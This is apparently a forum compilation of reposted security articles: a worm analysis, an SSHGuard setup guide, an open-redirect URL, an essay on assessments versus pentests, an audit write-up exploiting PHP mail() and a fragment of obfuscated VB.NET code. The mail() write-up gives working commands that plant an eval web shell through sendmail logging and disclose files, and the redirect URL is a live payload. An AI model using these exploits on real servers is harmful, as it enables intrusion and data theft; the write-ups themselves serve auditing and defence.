Made in the Czech Republic: a PHP Autorun worm November 3, 2011 at 7:21 am Recently, a new data-stealing worm caught our attention. The reason why it stands out from many similar amateur creations is that its author is most probably Czech, as the text strings, variable and function names used by the malware suggest. The Czech text above is displayed by the worm inside a console window and translates to: “Initializing. This operation can take several minutes. Please wait…”, pretending to be a message from Microsoft. But wait, variable and function names used by the programmer? Those aren’t normally seen in a compiled binary unless we have the associated PDB file (Program DataBase: a file format commonly created at compile-time that may list symbols that aren’t stored in the compiled module itself). But in this case, the worm is written entirely in PHP and “converted” to a PE file using the Bambalam PHP EXE Compiler/Embedder. This embedder simply encodes the PHP source files using Turck MMCache and then adds the resulting PHP bytecode as resources in a launcher binary. By decoding these, we were able to get a fairly accurate view of the original source code. So let’s take a look at what the malware actually does… Installation and Spread Firstly, we classify it as a worm, as it contains methods for spreading itself. In order to replicate through removable media and modify the infected system to ensure persistence, i.e. that it gets relaunched subsequently, the worm copies its body to the following locations: The root directory of all mounted volumes, except A: and B:. If the drive size is less than ~32GB, the autorun.inf file is also dropped in the hope of exploiting the (at last!) deprecated AutoRun feature of Windows. The Documents, Desktop, Start Menu, Start Menu\Programs and Start Menu\Programs\Startup folders for each user on the system and to the All Users Start Menu\Programs folder. Note that the worm can only copy itself to folders belonging to other users if the worm is run by an administrator account. Also, due to the change of folder naming from Windows Vista onwards, the worm is only able to copy itself to some of the listed folders on earlier Windows systems (such as XP) if it’s a Czech version of the OS. For each of the above mentioned locations, the worm randomly chooses one of the following innocuous-looking file names: setup.exe install.exe fotky.exe majkl_dzeksn.exe barunka.exe martinka.exe Harvesting data The purpose of the worm is to collect a large set of sensitive user data and system information, including: Messages and other information from various IM clients (such as QIP, ICQ, Digsby) Saved passwords and other information from various browsers (such as IE, Mozilla Firefox, Opera, Chrome) Saved passwords from common email clients (such as Outlook, Windows Mail, Yahoo! Mail or Gmail) Emails and other information from various email clients (such as Outlook, Outlook Express, Mozilla Thunderbird) Total Commander FTP passwords Stored Windows credentials Windows Address Book contacts Windows User account properties (excluding password) Network addresses, open connections, tables and statistics List of running processes and services Environment variables List of all user files and directories List of recently opened documents Contents of the Registry MS Windows and MS Office Product Keys The list of types of data that the worm harvests from the infected machine is quite long, and they are all gathered using various unsophisticated methods. In order to collect most of the data associated with Instant Messaging applications, browsers, and so on, the worm simply uploads all the files from the installation folders of the respective applications. For information related to Windows user accounts, network connections, running processes, and the Windows Registry, the following shell commands are used: net user ipconfig netstat arp tasklist regedit Another method employed for collecting the victim’s data is the use of third-party password-extraction utilities by NirSoft. The worm’s binary drops and executes four of these tools and sends their output back to the attacker. The worm uses a simple mechanism for sending the collected data to the remote server. It sends many HTTP POST requests (port 80) containing the stolen data gz-compressed and Base64 encoded. As you can see from the description above, the worm lacks the sophistication of some of the more advanced malware that we sometimes see. Yet, unfortunately, even these simple threats often get the job done. Given the very low prevalence of this malware, the fact that at the time of this writing 100% of the detections came from the Czech Republic, and its apparent Czech origin, there is a possibility that this tool was used in a targeted attack on a specific victim. Or it may just have been an experiment by an amateur malware-writer. Or both. ESET detects this worm as Win32/AutoRun.PSW.Agent.E. The malware analysis was done by Jakub Horky. Robert Lipovsky Malware Researcher Sursa: http://blog.eset.com/2011/11/03/made-in-the-czech-republic-a-php-autorun-worm

Protect your server with SSHGuard I’ve already talked about fail2ban and logcheck, 2 tools that can scan your logs and do actions, based on rules that you can give/modify, usually modify your iptables rules to stop active attacks against your server or simply send you a warning if some thing is found in the logs. Today we’ll see a similar tool, sshguard, it is different from the other two in that it is written in C, so it’s uses less memory and CPU while running, but still achiving the same results. So what does sshguard do? The short version is: it receives log messages, it detects when a networked service has been abused based on them, and blocks the address of who abused it; after some time, it releases the blocking. The full version is: sshguard runs on a machine as a small daemon, and receives log messages (in a number of ways, e.g. from syslog). When it determines that address X did something bad to service Y, it fires a rule in the machine’s firewall (one of the many supported) for blocking X. Sshguard keeps X blocked for some time, then releases it automatically. Please note that despite of his name sshguard detects attacks for many services out of the box, not only SSH but also several ftpds, Exim and dovecot. It can operate all the major firewalling systems, and features support for IPv6, whitelisting, suspension, and log message authentication Installation Sshguard is distributed under the permissive BSD license: you can use, modify and redistribute the software, at your own risk, for any use, including commercial, provided that you retain the original copyright notice you find in it. The software is distributed in the main repository of the most used GNU/Linux distributions and for some *BSD system, but you can also download the sources from their downlaod page. To install it on Debian (or other .deb distributions like Ubuntu) just run from a terminal: sudo aptitude install sshguard Setup and configuration Sshguard interfaces to the system in two points: the logging system (how sshguard receives log messages to monitor) the firewall (how sshguard blocks naughty addresses) Since version 1.5, sshguard comes with the Log Sucker. With the Log Sucker, SSHGuard fetches log entries proactively, and handles transparently events like rotated log files and files disappearing and reappearing. In the official documentation page there are instructions for many different firewalls, i’ll follow the instructions for netfilter/iptables. sshguard does not have a configuration file. All configuration that has to be done is creating a chain named “sshguard” in the INPUT chain of iptables where sshguard automatically inserts rules to drop packets coming from bad hosts: # for regular IPv4 support: iptables -N sshguard # if you want IPv6 support as well: ip6tables -N sshguard Now update the INPUT chain so it can pass all the traffic to sshguard, specify with -dport all the ports of services that you want to protect with sshguard. If you want to prevent attackers from doing any traffic to the host, remove the option completely: # block any traffic from abusers iptables -A INPUT -j sshguard ip6tables -A INPUT -j sshguard -- or -- # block abusers only for SSH, FTP, POP, IMAP services (use "multiport" module) iptables -A INPUT -m multiport -p tcp --destination-ports 21,22,110,143 -j sshguard ip6tables -A INPUT -m multiport -p tcp --destination-ports 21,22,110,143 -j sshguard If you do not currently use iptables and just want to get sshguard up and running without any further impact on your system, these commands will create and save an iptables configuration that does absolutely nothing except allowing sshguard to work: # iptables -F # iptables -X # iptables -P INPUT ACCEPT # iptables -P FORWARD ACCEPT # iptables -P OUTPUT ACCEPT # iptables -N sshguard # iptables -A INPUT -j sshguard # /etc/rc.d/iptables save Conclusions And that’s all you need to do to have a basic installation of sshguard up and running, it will help you to have your ssh, ftp and other daemons a bit more secure. Sursa: http://linuxaria.com/recensioni/protect-your-server-with-sshguard?lang=en

Poate util unora: *# Date:* 2.11.2011 *# Author:* Sony *# Blog : st2tea http://maps.google.com/m/preferences?pref=s&bl=//st2tea.blogspot.com&hl=1&safe=strict&safe=images&safe=off&gwt=on&gwt=off&lochist=on&lochist=off&sigp=pref%20bl&sig=AMctaOIRgcTAHYXz1KuVsPHwVpqFKrQCJg or http://maps.google.com/m/preferences?pref=s&bl=//%73%74%32%74%65%61%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D&hl=1&safe=strict&safe=images&safe=off&gwt=on&gwt=off&lochist=on&lochist=off&sigp=pref%20bl&sig=AMctaOIRgcTAHYXz1KuVsPHwVpqFKrQCJg Mirror: Google Maps Open Redirect ? Packet Storm Sursa: st2tea: Google Maps Open Redirect

Vulnerability Assessment vs Penetration Testing Few topics in the infosec world create as much heat as the classic "vulnerability assessment vs. penetration test” debate, and it’s no different in the web application security space. Sadly, the discussion isn’t usually around which is better. That would actually be an improvement. Instead the debate is usually semantic in nature, i.e. the flustered participants are usually disagreeing on what the terms actually mean. Step 1: agree on terms. So, I’ll be ambitious here and will tackle both subcomponents of the debate here: 1) what the terms actually mean, and 2) which is better for organizations to pursue. Web Vulnerability Assessment vs. Web Penetration Test It’s worth stating explicitly that these two types of security test are in fact quite different. Many make the mistake of thinking that a penetration test is simply a vulnerability assessment with exploitation, or that a vulnerability assessment is a penetration test without exploitation. This is incorrect. If that were the case then we’d simply have one term that we’d qualify with “with or without exploitation". A web application vulnerability assessment is fundamentally different from a penetration because its focus is on creating a list of as many findings as possible for a given web application. A penetration test, on the other hand, has a completely different purpose. Rather than yield a list of problems, a penetration test’s focus is the achievement of a specific goal set by the customer, e.g. "dump the customer database", or "become an administrative user within the application". Also important to note is the fact that a penetration test is successful if and when the goal is acheived–not when a massive list of vulnerabilities is produced. That’s what a vulnerability assessment is for. Some are tempted to say that this is a goal-based penetration test. My question to them is simple: "As opposed to what other type?" Penetration testing is goal-based. That’s its entire purpose. Even a customer direction as nebulous as "see what you can do" is absolutely a goal. It’s an implicit goal of getting as far as you can given whatever constraints are in place. The question of exploitation is another obstacle to clarity on this topic. Many have a simple binary switch for using the terms: "If there’s exploitation it’s a penetration test and if not it’s a vulnerability assessment." Again, the key difference here is list-based vs. goal-based–not exploitation. It’s possible do do (or not do) exploitation in both types of test. You can have a web vulnerability assessment where you are to exploit anything you find, and you can have a penetration test where you are asked to confirm that you can do something but not do it. Exploitation is an independent attribute that can be attached to either type of test. When to Use One vs. the Other Now that we see a distinction between terms, the next question is, "Which one is best?" Which should we be offering customers? As you may expect, the answer is that it depends on the customer and the project, but in my experience the answer will usually end up being a vulnerability assessment. Why? Because vulnerability assessments (getting a list of everything that needs fixing) is usually where most customers are in terms of maturity. To tightly summarize: via h30499.www3.hp.com Daniels dissertation on this matter is excellent. As the security landscape changes we will see more actual pentests occur, but right now most of what your testers are doing are assessments sold as pentests. That isn’t a bad thing. Pentesting is sexy because it has been market that way, not necessarily because it is better (or even a more fun project to work on) but because it fits a FUD marketing niche. When I DO do a an actual penetration test I prefer pentests with open goals that, within context to a business, my team can go after what they think effects the business the most. It’s an important distinction that what the business "thinks" is the crown jewels and keeps them in running (or is most valuable) is not actually what can hurt them the most. Some of our best attacks have been side channel, crazy things that have shown some of our awesome customers better ways to secure themselves. Assessments and Pentests will probably continue to be muddled terms hacked together by sales guys who work for bad consultancies for years to come. It’s important to testers and PM’s to know the real differences though. There is an even longer version of this discussion on his blog (http://danielmiessler.com/writing/va_vs_pt/#). November 2, 2011 Jhaddix Sursa: http://www.securityaegis.com/vulnerability-assessment-vs-penetration-testing/

Using mail() for Remote Code Execution Submitted by geoffrey on Thu, 11/03/2011 - 15:30 Last week we had to assess the security level of a PHP web application from its source code, in a white-box context. During this audit we found original ways to take advantage of the mail() function for remote code execution and file disclosure attacks while bypassing open_basedir. This article explains the approaches used for that type of audit, how PHP handles the mail function and how to perform such attacks using it. Methodologies There are three well known approaches to audit an application from its source code. The first one is the top-down approach, which consists to start from an entry point of the program and follow all code branches. The second method is the bottom-up approach: the auditor first establishes a list of interesting functions to audit and identify code areas where user inputs are used. There are cons and pros for both methods. The first one is time consuming but covers all the source code and provides a great understanding of how the application works. The later one is time saver and focuses on areas which are the most susceptible to be vulnerable, but doesn't follow all code branches and skips some kind of vulnerabilities, for example logic issues. Note that there is also another way which combines the benefits of each methods and tries to limit their disadvantages: the hybrid method. Vulnerable code In our approach we decided to use a top-down methodology and after a few time we saw that piece of code (recreated due to confidentiality reasons) which at first glance seems normal: $mail = new sendMail; $mail->setTo(input::post('to')); $mail->setSubject(input::post('subject')); $mail->setFrom(input::post('from')); $mail->setMessage(input::post('message')); $mail->send(); The method input::post is in fact a simple wrapper to get values from the $_POST array, controlled by the user. Next the setFrom function is called, which looks like the following: if (preg_match('#^[a-zA-Z0-9_.-]+@[a-zA-Z0-9-]+.[a-zA-Z0-9-.]+#', $from)) $this->from = (string) $from; The meta-character $ is not used, so the check made with preg_match can be bypassed cause the regex will only be applied on the first part of the subject, not all of it. After setting different parameters, the send function is executed: mail($this->to, $this->subject, $this->message, ..., "-f{$this->from}"); We can see that the variable from, controlled by the user, is passed to the fifth parameter of the mail function. Analysing mail() Using Reflection from the shell we can quickly know how the mail function works: php --rf mail Function [ <internal:standard> function mail ] { - Parameters [5] { Parameter #0 [ <required> $to ] Parameter #1 [ <required> $subject ] Parameter #2 [ <required> $message ] Parameter #3 [ <optional> $additional_headers ] Parameter #4 [ <optional> $additional_parameters ] } } In our case we control several parameters passed to mail but the more interesting seems to be the fifth one. Quoting php.net: The additional_parameters parameter can be used to pass additional flags as command line options to the program configured to be used when sending mail, as defined by the sendmail_path configuration setting. For example, this can be used to set the envelope sender address when using sendmail with the -f sendmail option. What we want to know now is how the command line options are passed to sendmail. For example we could try to exploit an escape shell vulnerability or abuse sendmail options. In order to do so we downloaded the PHP 5.3.0 source code and found that the code which handles mail is situated in ext/standard/mail.c: /* {{{ proto int mail(string to, string subject, string message [, string additional_headers [, string additional_parameters]]) Send an email message */ PHP_FUNCTION(mail) { char *to=NULL, *message=NULL, *headers=NULL; char *subject=NULL, *extra_cmd=NULL; int to_len, message_len, headers_len = 0; int subject_len, extra_cmd_len = 0, i; char *force_extra_parameters = INI_STR("mail.force_extra_parameters"); char *to_r, *subject_r; char *p, *e; if (PG(safe_mode) && (ZEND_NUM_ARGS() == 5)) { php_error_docref(NULL TSRMLS_CC, E_WARNING, "SAFE MODE Restriction in effect. The fifth parameter is disabled in SAFE MODE"); RETURN_FALSE; } if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "sss|ss", &to, &to_len, &subject, &subject_len, &message, &message_len,&headers, &headers_len, &extra_cmd, &extra_cmd_len) == FAILURE ) { return; } As you can see the safe_mode implementation is not centralised: for each function concerned by this directive, the developpers must consider all safe_mode directives and ensure that they are properly applied, otherwise you can bypass that protection. That is one of the many reasons why this directive is now turned off by default. In the case of mail, the use of the fifth parameter is restricted when the safe_mode is enabled, that is why the number of arguments passed to the function is checked. Then the zend_parse_parameters function is called and extra_cmd is set with the fifth parameter. if (force_extra_parameters) { extra_cmd = php_escape_shell_cmd(force_extra_parameters); } else if (extra_cmd) { extra_cmd = php_escape_shell_cmd(extra_cmd); } if (php_mail(to_r, subject_r, message, headers, extra_cmd TSRMLS_CC)) { RETVAL_TRUE; The variable extra_cmd is then passed to php_escape_shell_cmd which escapes special characters that can be used to execute other commands. Finally the php_mail function is called. /* {{{ php_mail */ PHPAPI int php_mail(char *to, char *subject, char *message, char *headers, char *extra_cmd TSRMLS_DC) { ... snip ... FILE *sendmail; int ret; char *sendmail_path = INI_STR("sendmail_path"); char *sendmail_cmd = NULL; char *mail_log = INI_STR("mail.log"); char *hdr = headers; ... snip ... if (extra_cmd != NULL) { spprintf(&sendmail_cmd, 0, "%s %s", sendmail_path, extra_cmd); } else { sendmail_cmd = sendmail_path; } ... snip ... sendmail = popen(sendmail_cmd, "w"); PHP then retrieves the value of the sendmail_path directive and uses spprintf to create the command line sendmail_cmd, which is then passed to popen. Let's take an example to see how the final command will be like: (gdb) file php Reading symbols from /opt/php-5.3.0/sapi/cli/php...done. (gdb) set args -r 'mail("a@b.com", "s", "m", "", "-arg val");' (gdb) b mail.c:291 Breakpoint 1 at 0x83f39b2: file /opt/php-5.3.0/ext/standard/mail.c, line 291. (gdb) r Starting program: /opt/php-5.3.0/sapi/cli/php -r 'mail("a@b.com", "s", "m", "", "-arg val");' [Thread debugging using libthread_db enabled] Breakpoint 1, php_mail (to=0x8b5c2b8 "a@b.com", subject=0x8b5c2ec "s", message=0x8b5be2c "m", headers=0x8b5be9c "", extra_cmd=0x8b5c31c "-arg val") at /opt/php-5.3.0/ext/standard/mail.c:291 291 sendmail = popen(sendmail_cmd, "w"); (gdb) p sendmail_path $1 = 0x89af284 "/usr/sbin/sendmail -t -i " (gdb) p sendmail_cmd $2 = 0x8b5c35c "/usr/sbin/sendmail -t -i -arg val" Now that we have a great understanding of how mail works we can focus on the exploitation step. The sendmail program provides several parameters and options which are well documented in this document. Exploiting sendmail is a known subject but the context we are facing is really different from what actually exists: we can only pass parameters escaped with php_escape_shell_cmd to it. Code execution The main idea to implement this type of attack was to send a special string which contains PHP code into the SMTP message, and use sendmail features to log the message in a file with a php extension. This includes that we must have write rights to create/modify the targeted file. After some research we saw that the -X parameter could be used to log the traffic between the client and the MTA: this is exactly what we are looking for. In order to see which parameters can be used to inject PHP code in the log file, we tested each of them: # PHPFROM="<?php CLI; ?>" # SUBJECT="<?php SUBJECT; ?>" # MESSAGE="<?php BODY; ?>" # HEADERS="<?php HEADER; ?>" # PARAMS="-f\'${PHPFROM}\' -OQueueDirectory=/tmp -X /var/www/uploads/back.php" # php -r "mail('a@b.c', '${SUBJECT}', '${MESSAGE}', '${HEADERS}', '${PARAMS}');" Parameters passed to sendmail will bypass the restrictions imposed by open_basedir because this directive only checks paths used in a PHP context. The content of the created file was the following: 03785 <<< To: a@b.c 03785 <<< Subject: <?php SUBJECT; ?> 03785 <<< X-PHP-Originating-Script: 1000:Command line code 03785 <<< <?php HEADER; ?> 03785 <<< 03785 <<< <?php BODY; ?> 03785 <<< [EOF] 03785 === CONNECT [127.0.0.1] 03785 <<< 220 self.com ESMTP Sendmail 8.14.4/8.14.4/Debian-2ubuntu1;... 03785 >>> EHLO self.com 03785 <<< 250-self.com Hello localhost [127.0.0.1], pleased to meet you 03785 <<< 250-ENHANCEDSTATUSCODES 03785 <<< 250-PIPELINING 03785 <<< 250-EXPN 03785 <<< 250-VERB 03785 <<< 250-8BITMIME 03785 <<< 250-SIZE 03785 <<< 250-DSN 03785 <<< 250-ETRN 03785 <<< 250-AUTH DIGEST-MD5 CRAM-MD5 03785 <<< 250-DELIVERBY 03785 <<< 250 HELP 03785 >>> MAIL From:<\<\?php.CLI\;.\?\>@self.com> SIZE=119 03785 <<< 250 2.1.0 <\<\?php.CLI\;.\?\>@self.com>... Sender ok 03785 >>> RCPT To:<a@b.c> 03785 >>> DATA 03785 <<< 250 2.1.5 <a@b.c>... Recipient ok 03785 <<< 354 Enter mail, end with "." on a line by itself 03785 >>> Received: (from yup@localhost) 03785 >>> by self.com (8.14.4/8.14.4/Submit) id p9S9C8p1003785; 03785 >>> Fri, 28 Oct 2011 11:12:08 +0200 03785 >>> Date: Fri, 28 Oct 2011 11:12:08 +0200 03785 >>> From: \<\?php.CLI\;.\?\>@self.com 03785 >>> Message-Id: <201110280912.p9S9C8p1003785@self.com> 03785 >>> X-Authentication-Warning: self.com: yup set sender to \<\?php CLI\; \?\> using -f 03785 >>> X-Authentication-Warning: self.com: Processed from queue /tmp 03785 >>> To: a@b.c 03785 >>> Subject: <?php SUBJECT; ?> 03785 >>> X-PHP-Originating-Script: 1000:Command line code 03785 >>> 03785 >>> <?php HEADER; ?> 03785 >>> As you can see there is no problem if we control the subject, the message or the headers: the PHP code stored in the file back.php will get executed. But this would add a condition: we should control the fifth parameter and another one. That is the case of the application we audit, but we want to search for a way to exploit it even if we only control the last parameter. The fifth parameter is escaped and will not result in PHP code execution, but we found a way to bypass that by putting the character @ into the from (-f) parameter passed to sendmail: # PHPFROM="<?php CLI;/*@*/ ?>" # SUBJECT=;MESSAGE=;HEADERS=; # PARAMS="-f\'${PHPFROM}\' -OQueueDirectory=/tmp -X /var/www/uploads/back.php" # php -r "mail('a@b.c', '${SUBJECT}', '${MESSAGE}', '${HEADERS}', '${PARAMS}');" Which results in: 06532 >>> MAIL From:<\<\?php.CLI\;/\*@\*/\?\>> SIZE=72 06532 <<< 250 2.1.0 <\<\?php.CLI\;/\*@\*/\?\>>... Sender ok 06532 >>> RCPT To:<a@b.c> 06532 >>> DATA 06532 <<< 553 5.1.8 <a@b.c>... Domain of sender address <?php.CLI;/*@*/?> does not exist When we put the character @, sendmail tries to resolve the domain */?>.com by making up a DNS query. Because the domain doesn't exist it outputs an error with the email of the sender formatted: spaces are replaced by dots and magic happens: the character \ is removed. The effects of php_escape_shell_cmd are now removed but we must still find a way to execute PHP code without entering whitespaces. To do so we checked how the Zend Engine handles the PHP open tags and decide whether or not to execute the code. It uses Lex rules situated in Zend/zend_language_scanner.l: WHITESPACE [ \n\r\t]+ NEWLINE ("\r"|"\n"|"\r\n") ... snip ... <INITIAL>"<script"{WHITESPACE}+"language"{WHITESPACE}*"="{WHITESPACE}*("php"|"\"php\""|"'php'"){WHITESPACE}*">" { ... snip ... <INITIAL>"<%=" { if (CG(asp_tags)) { ... snip ... <INITIAL>"<?=" { if (CG(short_tags)) { ... snip ... <INITIAL>"<%" { if (CG(asp_tags)) { ... snip ... <INITIAL>"<?php"([ \t]|{NEWLINE}) { ... snip ... <INITIAL>"<?" { if (CG(short_tags)) { Looking at this code we can conclude that the only open tags which doesn't require whitespaces are short tags, which are enabled by default, and asp tags. # PHPFROM="<?if(isset(\$_SERVER[HTTP_SHELL]))eval(\$_SERVER[HTTP_SHELL]);/*@*/?>" # SUBJECT=;MESSAGE=;HEADERS=; # PARAMS="-f\'${PHPFROM}\' -OQueueDirectory=/tmp -X /var/www/uploads/back.php" # php -r "mail('a@b.c', '${SUBJECT}', '${MESSAGE}', '${HEADERS}', '${PARAMS}');" Using these commands, we now have a remote code execution on the application: 08744 <<< 553 5.1.8 <a@b.c>... Domain of sender address <?if(isset($_SERVER[HTTP_SHELL]))eval($_SERVER[HTTP_SHELL]);/*@*/?> does not exist At the end of the audit we also found another way to exploit it even if short_open_tag is turned off: it was found that sendmail replaces the \n character to a space, so we can use the standard open tags. File disclosure The -C parameter permits to use an alternate configuration file. Using this parameter with an invalid configuration file will cause sendmail to output an error for each line it doesn't understand. This can be used to display the content of a targeted file. # SUBJECT=;MESSAGE=;HEADERS=; # PARAMS="-C/var/www/phpinfo.php -OQueueDirectory=/tmp -X/var/www/uploads/f.txt" # php -r "mail('a@b.c', '${SUBJECT}', '${MESSAGE}', '${HEADERS}', '${PARAMS}');" These commands are used to write the content of the file phpinfo.php to f.txt: 04151 >>> /var/www/phpinfo.php: line 1: unknown configuration line "<?php" 04151 >>> /var/www/phpinfo.php: line 3: unknown configuration line "phpinfo();" 04151 >>> /var/www/phpinfo.php: line 5: unknown configuration line "?>" 04151 >>> No local mailer defined Note also that if you are having troubles with the method explained previously to obtain remote code execution, you can use this parameter: if you can inject PHP code in a file situated on the webserver (eg: session files, apache logs, etc.), you can then write its content into a php file and execute it. Conclusion In this audit, the vulnerability was only caused of one missing character, which lead us to remote code execution. Entering in PHP internals helped us to see the protections applied, to have a great understanding of how mail was handled and later, thanks to the Lex rules, to know how to bypass the condition about spaces. In the exploitation part we also showed how to circumvent the conditions added by php_escape_shell_cmd and short_open_tag. Finally, the most important things to keep in mind are the methodology, the tests and the research we did, not the final exploitation itself. Sursa: Using mail() for Remote Code Execution | Sogeti ESEC Pentest A se vedea si link-urile din articol.

Interesant: Const ady = "@targuOCna@" Private Shared Function beleste(ByVal bas As String, ByVal sadsa As Long) As String() Dim carnatzel As Long = Math.Ceiling(bas.Length / sadsa) Dim piula(carnatzel - 1) As String Dim MAMAIE As Long = 0 Dim pompeaza = IO.File.OpenWrite(dialog2.FileName) Dim marishor = pompeaza.Seek(0, IO.SeekOrigin.[End])